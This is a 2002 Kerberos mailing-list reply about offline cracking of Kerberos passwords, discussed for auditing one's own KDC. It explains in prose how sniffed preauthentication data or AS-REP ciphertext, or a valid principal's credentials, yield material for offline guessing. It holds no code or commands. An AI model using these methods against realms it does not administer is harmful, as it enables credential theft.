On Sat, Nov 30, 2002 at 08:24:55PM -0800, Russ Allbery wrote: > Paul Vixie <[EMAIL PROTECTED]> writes: > > > is there a "crack" module for kerberos? after reading the stanford > > paper about how kerberos tickets could be attacked offline, i've been > > wanting to actually try this -- no sniffing is required -- against my > > own kerberos db to look for easy to guess passwords. > > Note that the findings of that paper only apply if you use Kerberos v4 or > don't have preauth turned on. If you're using Kerberos v5 with preauth > turned on for all users, you cannot launch that style of off-line attack.
If you can sniff the network, you can collect the preauthentication data and/or the AS-REP and use that ciphertext to launch an off-line attack quite easily. There is also a third method of collecting such data if you have a valid principal and password in the target realm, for which you need not even have the capability of sniffing the network. > I know that Jack the Ripper has code available to work against an AFS > kaserver database, but I don't know about Kerberos v5. It is trivial to write additional code for Jack the Ripper to crack Kerberos 5 passwords (either from a KDC database or collected as mentioned above) --- less than two hours work. > We link cracklib > along with additional fascist rules into our kadmind and basically try to > "pre-crack" passwords whenever anyone changes them. Good idea. Cheers, -- Jacques A. Vidrine <[EMAIL PROTECTED]> http://www.celabo.org/ NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos [EMAIL PROTECTED] . [EMAIL PROTECTED] . [EMAIL PROTECTED] ________________________________________________ Kerberos mailing list [EMAIL PROTECTED] http://mailman.mit.edu/mailman/listinfo/kerberos
